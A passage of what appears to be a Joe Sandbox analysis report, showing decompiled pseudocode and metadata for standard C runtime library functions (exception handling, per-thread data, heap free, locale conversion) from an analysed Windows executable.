                          				void* _t20;
                          				void* _t22;
                          				void* _t23;
                          				void* _t25;
                          				intOrPtr* _t26;
                          				void* _t27;
                          				void* _t28;
                          
                          				_t27 = __esi;
                          				_t26 = __edi;
                          				_t23 = __ecx;
                          				_t22 = __ebx;
                          				_t30 = _a20;
                          				if(_a20 != 0) {
                          					_push(_a20);
                          					_push(__ebx);
                          					_push(__esi);
                          					_push(_a4);
                          					E00416343(__ebx, __edi, __esi, _t30);
                          					_t28 = _t28 + 0x10;
                          				}
                          				_t31 = _a28;
                          				_push(_a4);
                          				if(_a28 != 0) {
                          					_push(_a28);
                          				} else {
                          					_push(_t27);
                          				}
                          				E0041591B(_t23);
                          				_push( *_t26);
                          				_push(_a16);
                          				_push(_a12);
                          				_push(_t27);
                          				E00415DC0(_t22, _t25, _t26, _t27, _t31);
                          				_push(0x100);
                          				_push(_a24);
                          				_push(_a16);
                          				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                          				_push(_a8);
                          				_push(_t27);
                          				_push(_a4);
                          				_t20 = E00416028(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
                          				if(_t20 != 0) {
                          					E004158D4(_t20, _t27);
                          					return _t20;
                          				}
                          				return _t20;
                          			}











                          0x004163d5
                          0x004163d5
                          0x004163d5
                          0x004163d5
                          0x004163da
                          0x004163de
                          0x004163e0
                          0x004163e3
                          0x004163e4
                          0x004163e5
                          0x004163e8
                          0x004163ed
                          0x004163ed
                          0x004163f0
                          0x004163f4
                          0x004163f7
                          0x004163fc
                          0x004163f9
                          0x004163f9
                          0x004163f9
                          0x004163ff
                          0x00416404
                          0x00416406
                          0x00416409
                          0x0041640c
                          0x0041640d
                          0x00416415
                          0x0041641a
                          0x0041641e
                          0x00416421
                          0x00416424
                          0x0041642a
                          0x0041642b
                          0x0041642e
                          0x00416438
                          0x0041643c
                          0x00000000
                          0x0041643c
                          0x00416442

                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 004163E8
                            • Part of subcall function 00416343: ___BuildCatchObjectHelper.LIBCMT ref: 00416379
                          • _UnwindNestedFrames.LIBCMT ref: 004163FF
                          • ___FrameUnwindToState.LIBCMT ref: 0041640D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                          • String ID: TsA$csm
                          • API String ID: 2163707966-3388165190
                          • Opcode ID: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
                          • Instruction ID: d69c25e17cad3efa29224d1e44031e3b4bab8f93dc90641abc2906f6c70405cc
                          • Opcode Fuzzy Hash: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
                          • Instruction Fuzzy Hash: 1901467100010AFBDF126F52CC45EEB7F6AEF08354F01802ABC1815121DB3AD9B1DBAA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00415D77(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                          				signed int _v8;
                          				void* __ebp;
                          				intOrPtr* _t15;
                          				intOrPtr* _t18;
                          				void* _t22;
                          
                          				_t25 = __esi;
                          				_t24 = __edi;
                          				_t23 = __edx;
                          				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                          				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                          					__eflags =  *((intOrPtr*)(E0040BD70(_t22, __edx, __eflags) + 0x90));
                          					if(__eflags > 0) {
                          						_t15 = E0040BD70(_t22, __edx, __eflags) + 0x90;
                          						 *_t15 =  *_t15 - 1;
                          						__eflags =  *_t15;
                          					}
                          					goto L9;
                          				} else {
                          					__eflags = __eax - 0xe06d7363;
                          					if(__eflags != 0) {
                          						L9:
                          						__eflags = 0;
                          						return 0;
                          					} else {
                          						 *(E0040BD70(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                          						_push(8);
                          						_push(0x416fc0);
                          						E00408168(_t22, __edi, __esi);
                          						_t18 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t30) + 0x78));
                          						if(_t18 != 0) {
                          							_v8 = _v8 & 0x00000000;
                          							 *_t18();
                          							_v8 = 0xfffffffe;
                          						}
                          						return E004081AD(E00411135(_t22, _t23, _t24, _t25));
                          					}
                          				}
                          			}








                          0x00415d77
                          0x00415d77
                          0x00415d77
                          0x00415d83
                          0x00415d88
                          0x00415da7
                          0x00415dae
                          0x00415db5
                          0x00415dba
                          0x00415dba
                          0x00415dba
                          0x00000000
                          0x00415d8a
                          0x00415d8a
                          0x00415d8f
                          0x00415dbc
                          0x00415dbc
                          0x00415dbf
                          0x00415d91
                          0x00415d96
                          0x0040c34d
                          0x0040c34f
                          0x0040c354
                          0x0040c35e
                          0x0040c363
                          0x0040c365
                          0x0040c369
                          0x0040c374
                          0x0040c374
                          0x0040c385
                          0x0040c385
                          0x00415d8f

                          APIs
                          • __getptd.LIBCMT ref: 00415D91
                            • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                            • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                          • __getptd.LIBCMT ref: 00415DA2
                          • __getptd.LIBCMT ref: 00415DB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$csm
                          • API String ID: 803148776-1389381023
                          • Opcode ID: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
                          • Instruction ID: 7476e578de222c3f650eae696de84e137a600846ab43f73c4baadf4b58ee893f
                          • Opcode Fuzzy Hash: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
                          • Instruction Fuzzy Hash: 65E01A35110608CFC710AB69D04ABE977A5FF85318F1541A6E80CC73A3D73CE880968E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E0040E92F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				signed int _t15;
                          				LONG* _t21;
                          				long _t23;
                          				void* _t31;
                          				LONG* _t33;
                          				void* _t34;
                          				void* _t35;
                          
                          				_t35 = __eflags;
                          				_t29 = __edx;
                          				_t25 = __ebx;
                          				_push(0xc);
                          				_push(0x417108);
                          				E00408168(__ebx, __edi, __esi);
                          				_t31 = E0040BD70(__ebx, __edx, _t35);
                          				_t15 =  *0x418d34; // 0xfffffffe
                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                          					E00407670(_t25, _t29, _t31, 0xd);
                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                          					_t33 =  *(_t31 + 0x68);
                          					 *(_t34 - 0x1c) = _t33;
                          					__eflags = _t33 -  *0x418c38; // 0x942c20
                          					if(__eflags != 0) {
                          						__eflags = _t33;
                          						if(_t33 != 0) {
                          							_t23 = InterlockedDecrement(_t33);
                          							__eflags = _t23;
                          							if(_t23 == 0) {
                          								__eflags = _t33 - 0x418810;
                          								if(_t33 != 0x418810) {
                          									_push(_t33);
                          									E0040617D();
                          								}
                          							}
                          						}
                          						_t21 =  *0x418c38; // 0x942c20
                          						 *(_t31 + 0x68) = _t21;
                          						_t33 =  *0x418c38; // 0x942c20
                          						 *(_t34 - 0x1c) = _t33;
                          						InterlockedIncrement(_t33);
                          					}
                          					 *(_t34 - 4) = 0xfffffffe;
                          					E0040E9CA();
                          				} else {
                          					_t33 =  *(_t31 + 0x68);
                          				}
                          				if(_t33 == 0) {
                          					E00406BE8(0x20);
                          				}
                          				return E004081AD(_t33);
                          			}










                          0x0040e92f
                          0x0040e92f
                          0x0040e92f
                          0x0040e92f
                          0x0040e931
                          0x0040e936
                          0x0040e940
                          0x0040e942
                          0x0040e94a
                          0x0040e96b
                          0x0040e971
                          0x0040e975
                          0x0040e978
                          0x0040e97b
                          0x0040e981
                          0x0040e983
                          0x0040e985
                          0x0040e988
                          0x0040e98e
                          0x0040e990
                          0x0040e992
                          0x0040e998
                          0x0040e99a
                          0x0040e99b
                          0x0040e9a0
                          0x0040e998
                          0x0040e990
                          0x0040e9a1
                          0x0040e9a6
                          0x0040e9a9
                          0x0040e9af
                          0x0040e9b3
                          0x0040e9b3
                          0x0040e9b9
                          0x0040e9c0
                          0x0040e952
                          0x0040e952
                          0x0040e952
                          0x0040e957
                          0x0040e95b
                          0x0040e960
                          0x0040e968

                          APIs
                          • __getptd.LIBCMT ref: 0040E93B
                            • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                            • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                          • __amsg_exit.LIBCMT ref: 0040E95B
                          • __lock.LIBCMT ref: 0040E96B
                          • InterlockedDecrement.KERNEL32(?), ref: 0040E988
                          • InterlockedIncrement.KERNEL32(00942C20), ref: 0040E9B3
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          • Opcode ID: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
                          • Instruction ID: ab0f9b78bd71dce74febf2d25f83fab80e53a4f08a0c435d7ef074ac4792bfe4
                          • Opcode Fuzzy Hash: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
                          • Instruction Fuzzy Hash: 1B01C8B1906625DBC761AB2B9945B9A7360AF04754F04443FE800772D1CF3C6C61CBDD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E0040617D() {
                          				intOrPtr* _t10;
                          				intOrPtr _t13;
                          				void* _t15;
                          				void* _t21;
                          				void* _t22;
                          				void* _t23;
                          				intOrPtr _t24;
                          				void* _t26;
                          
                          				_push(0xc);
                          				_push(0x416d00);
                          				_t8 = E00408168(_t15, _t22, _t23);
                          				_t24 =  *((intOrPtr*)(_t26 + 8));
                          				if(_t24 == 0) {
                          					L9:
                          					return E004081AD(_t8);
                          				}
                          				if( *0x44625c != 3) {
                          					_push(_t24);
                          					L7:
                          					if(HeapFree( *0x4432c8, 0, ??) == 0) {
                          						_t10 = E0040747B();
                          						 *_t10 = E00407439(GetLastError());
                          					}
                          					goto L9;
                          				}
                          				E00407670(_t15, _t21, _t22, 4);
                          				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                          				_t13 = E004076A3(_t24);
                          				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                          				if(_t13 != 0) {
                          					_push(_t24);
                          					_push(_t13);
                          					E004076D3();
                          				}
                          				 *(_t26 - 4) = 0xfffffffe;
                          				_t8 = E004061D3();
                          				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                          					goto L9;
                          				} else {
                          					_push( *((intOrPtr*)(_t26 + 8)));
                          					goto L7;
                          				}
                          			}











                          0x0040617d
                          0x0040617f
                          0x00406184
                          0x00406189
                          0x0040618e
                          0x00406205
                          0x0040620a
                          0x0040620a
                          0x00406197
                          0x004061dc
                          0x004061dd
                          0x004061ed
                          0x004061ef
                          0x00406202
                          0x00406204
                          0x00000000
                          0x004061ed
                          0x0040619b
                          0x004061a1
                          0x004061a6
                          0x004061ac
                          0x004061b1
                          0x004061b3
                          0x004061b4
                          0x004061b5
                          0x004061bb
                          0x004061bc
                          0x004061c3
                          0x004061cc
                          0x00000000
                          0x004061ce
                          0x004061ce
                          0x00000000
                          0x004061ce

                          APIs
                          • __lock.LIBCMT ref: 0040619B
                            • Part of subcall function 00407670: __mtinitlocknum.LIBCMT ref: 00407686
                            • Part of subcall function 00407670: __amsg_exit.LIBCMT ref: 00407692
                            • Part of subcall function 00407670: EnterCriticalSection.KERNEL32(?,?,?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001), ref: 0040769A
                          • ___sbh_find_block.LIBCMT ref: 004061A6
                          • ___sbh_free_block.LIBCMT ref: 004061B5
                          • HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
                          • GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: db484a3990fbe0cadc871ec08e73f824e3e60cc1aafe4cac5bf7a484ffdfff19
                          • Instruction ID: 8a843b870c6c596149a6f540d40501c749865fbe93a0626fa4fdcb27d608762f
                          • Opcode Fuzzy Hash: db484a3990fbe0cadc871ec08e73f824e3e60cc1aafe4cac5bf7a484ffdfff19
                          • Instruction Fuzzy Hash: 3001A771D04211AAEB207F72AC05B5F3A649F01764F11407FF4527A1D2DA3D9991CF9E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00410C88() {
                          				signed long long _v12;
                          				signed int _v20;
                          				signed long long _v28;
                          				signed char _t8;
                          
                          				_t8 = GetModuleHandleA("KERNEL32");
                          				if(_t8 == 0) {
                          					L6:
                          					_v20 =  *0x403638;
                          					_v28 =  *0x403630;
                          					asm("fsubr qword [ebp-0x18]");
                          					_v12 = _v28 / _v20 * _v20;
                          					asm("fld1");
                          					asm("fcomp qword [ebp-0x8]");
                          					asm("fnstsw ax");
                          					if((_t8 & 0x00000005) != 0) {
                          						return 0;
                          					} else {
                          						return 1;
                          					}
                          				} else {
                          					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                          					if(__eax == 0) {
                          						goto L6;
                          					} else {
                          						_push(0);
                          						return __eax;
                          					}
                          				}
                          			}







                          0x00410c8d
                          0x00410c95
                          0x00410cac
                          0x00410c58
                          0x00410c61
                          0x00410c6d
                          0x00410c70
                          0x00410c73
                          0x00410c75
                          0x00410c78
                          0x00410c7d
                          0x00410c87
                          0x00410c7f
                          0x00410c83
                          0x00410c83
                          0x00410c97
                          0x00410c9d
                          0x00410ca5
                          0x00000000
                          0x00410ca7
                          0x00410ca7
                          0x00410cab
                          0x00410cab
                          0x00410ca5

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,0040AE7A), ref: 00410C8D
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00410C9D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          • Opcode ID: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
                          • Instruction ID: 2cc87d07ba03b1b782b82d160500d17f1eff63234b3d3f6bb45c75640bbf4e22
                          • Opcode Fuzzy Hash: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
                          • Instruction Fuzzy Hash: 2FF03030A00A09E2DF142FA1AE0A6AF7E7CBB80702F9105A1D1D6B01D4EF7581F5C69A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040DEDE(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                          				intOrPtr _v8;
                          				signed int _v12;
                          				char _v20;
                          				signed int _t54;
                          				intOrPtr _t56;
                          				int _t57;
                          				int _t58;
                          				signed short* _t59;
                          				short* _t60;
                          				int _t65;
                          				char* _t73;
                          
                          				_t73 = _a8;
                          				if(_t73 == 0 || _a12 == 0) {
                          					L5:
                          					return 0;
                          				} else {
                          					if( *_t73 != 0) {
                          						E0040904E( &_v20, __edi, _a16);
                          						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                          							if(E0040E00F( *_t73 & 0x000000ff,  &_v20) == 0) {
                          								if(MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                          									L10:
                          									if(_v8 != 0) {
                          										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                          									}
                          									return 1;
                          								}
                          								L21:
                          								_t54 = E0040747B();
                          								 *_t54 = 0x2a;
                          								if(_v8 != 0) {
                          									_t54 = _v12;
                          									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                          								}
                          								return _t54 | 0xffffffff;
                          							}
                          							_t56 = _v20;
                          							_t65 =  *(_t56 + 0xac);
                          							if(_t65 <= 1 || _a12 < _t65) {
                          								L17:
                          								if(_a12 <  *(_t56 + 0xac) || _t73[1] == 0) {
                          									goto L21;
                          								} else {
                          									goto L19;
                          								}
                          							} else {
                          								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                          								_t56 = _v20;
                          								if(_t58 != 0) {
                          									L19:
                          									_t57 =  *(_t56 + 0xac);
                          									if(_v8 == 0) {
                          										return _t57;
                          									}
                          									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                          									return _t57;
                          								}
                          								goto L17;
                          							}
                          						}
                          						_t59 = _a4;
                          						if(_t59 != 0) {
                          							 *_t59 =  *_t73 & 0x000000ff;
                          						}
                          						goto L10;
                          					} else {
                          						_t60 = _a4;
                          						if(_t60 != 0) {
                          							 *_t60 = 0;
                          						}
                          						goto L5;
                          					}
                          				}
                          			}














                          0x0040dee8
                          0x0040deef
                          0x0040df06
                          0x00000000
                          0x0040def6
                          0x0040def8
                          0x0040df12
                          0x0040df1d
                          0x0040df4f
                          0x0040dfed
                          0x0040df2d
                          0x0040df30
                          0x0040df35
                          0x0040df35
                          0x00000000
                          0x0040df3b
                          0x0040dfaf
                          0x0040dfaf
                          0x0040dfb4
                          0x0040dfbd
                          0x0040dfbf
                          0x0040dfc2
                          0x0040dfc2
                          0x00000000
                          0x0040dfc6
                          0x0040df51
                          0x0040df54
                          0x0040df5d
                          0x0040df84
                          0x0040df8d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040df64
                          0x0040df77
                          0x0040df7f
                          0x0040df82
                          0x0040df94
                          0x0040df94
                          0x0040df9d
                          0x0040df0b
                          0x0040df0b
                          0x0040dfa6
                          0x00000000
                          0x0040dfa6
                          0x00000000
                          0x0040df82
                          0x0040df5d
                          0x0040df1f
                          0x0040df24
                          0x0040df2a
                          0x0040df2a
                          0x00000000
                          0x0040defa
                          0x0040defa
                          0x0040deff
                          0x0040df03
                          0x0040df03
                          0x00000000
                          0x0040deff
                          0x0040def8

                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040DF12
                          • __isleadbyte_l.LIBCMT ref: 0040DF46
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DF77
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DFE5
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
                          • Instruction ID: 3364307831111e090e90a540cb8b838cdfe72a3ac2f9eac63f3894a4aac76be5
                          • Opcode Fuzzy Hash: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
                          • Instruction Fuzzy Hash: 0D31CE31E00247EFCB20EFA4C884AAA3BA1AF01310F14857AF562AB2D1D334DD54DB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410B74(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				intOrPtr _t25;
                          				void* _t26;
                          				void* _t28;
                          
                          				_t25 = _a16;
                          				if(_t25 == 0x65 || _t25 == 0x45) {
                          					_t26 = E00410465(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                          					goto L9;
                          				} else {
                          					_t34 = _t25 - 0x66;
                          					if(_t25 != 0x66) {
                          						__eflags = _t25 - 0x61;
                          						if(_t25 == 0x61) {
                          							L7:
                          							_t26 = E00410555(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                          						} else {
                          							__eflags = _t25 - 0x41;
                          							if(__eflags == 0) {
                          								goto L7;
                          							} else {
                          								_t26 = E00410A7A(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                          							}
                          						}
                          						L9:
                          						return _t26;
                          					} else {
                          						return E004109BF(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                          					}
                          				}
                          			}






                          0x00410b79
                          0x00410b7f
                          0x00410bf2
                          0x00000000
                          0x00410b86
                          0x00410b86
                          0x00410b89
                          0x00410ba4
                          0x00410ba7
                          0x00410bc7
                          0x00410bd9
                          0x00410ba9
                          0x00410ba9
                          0x00410bac
                          0x00000000
                          0x00410bae
                          0x00410bc0
                          0x00410bc0
                          0x00410bac
                          0x00410bf7
                          0x00410bfb
                          0x00410b8b
                          0x00410ba3
                          0x00410ba3
                          0x00410b89

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction ID: a00fe7094c665b1aa83b003f8bcb39f1fd7a9ba829c258cca2bc7f148fee25eb
                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction Fuzzy Hash: 3A117E3204414AFBCF125ED4CC51CEE3F22BB18358F588416FA5859131C77AD9F1AB89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0040F09B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				signed int _t13;
                          				intOrPtr _t27;
                          				intOrPtr _t29;
                          				void* _t30;
                          				void* _t31;
                          
                          				_t31 = __eflags;
                          				_t26 = __edi;
                          				_t25 = __edx;
                          				_t22 = __ebx;
                          				_push(0xc);
                          				_push(0x417148);
                          				E00408168(__ebx, __edi, __esi);
                          				_t29 = E0040BD70(__ebx, __edx, _t31);
                          				_t13 =  *0x418d34; // 0xfffffffe
                          				if(( *(_t29 + 0x70) & _t13) == 0) {
                          					L6:
                          					E00407670(_t22, _t25, _t26, 0xc);
                          					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                          					_t8 = _t29 + 0x6c; // 0x6c
                          					_t27 =  *0x418e18; // 0x418d40
                          					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F05D(_t8, _t27);
                          					 *(_t30 - 4) = 0xfffffffe;
                          					E0040F105();
                          				} else {
                          					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                          					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                          						goto L6;
                          					} else {
                          						_t29 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t33) + 0x6c));
                          					}
                          				}
                          				if(_t29 == 0) {
                          					E00406BE8(0x20);
                          				}
                          				return E004081AD(_t29);
                          			}








                          0x0040f09b
                          0x0040f09b
                          0x0040f09b
                          0x0040f09b
                          0x0040f09b
                          0x0040f09d
                          0x0040f0a2
                          0x0040f0ac
                          0x0040f0ae
                          0x0040f0b6
                          0x0040f0da
                          0x0040f0dc
                          0x0040f0e2
                          0x0040f0e6
                          0x0040f0e9
                          0x0040f0f4
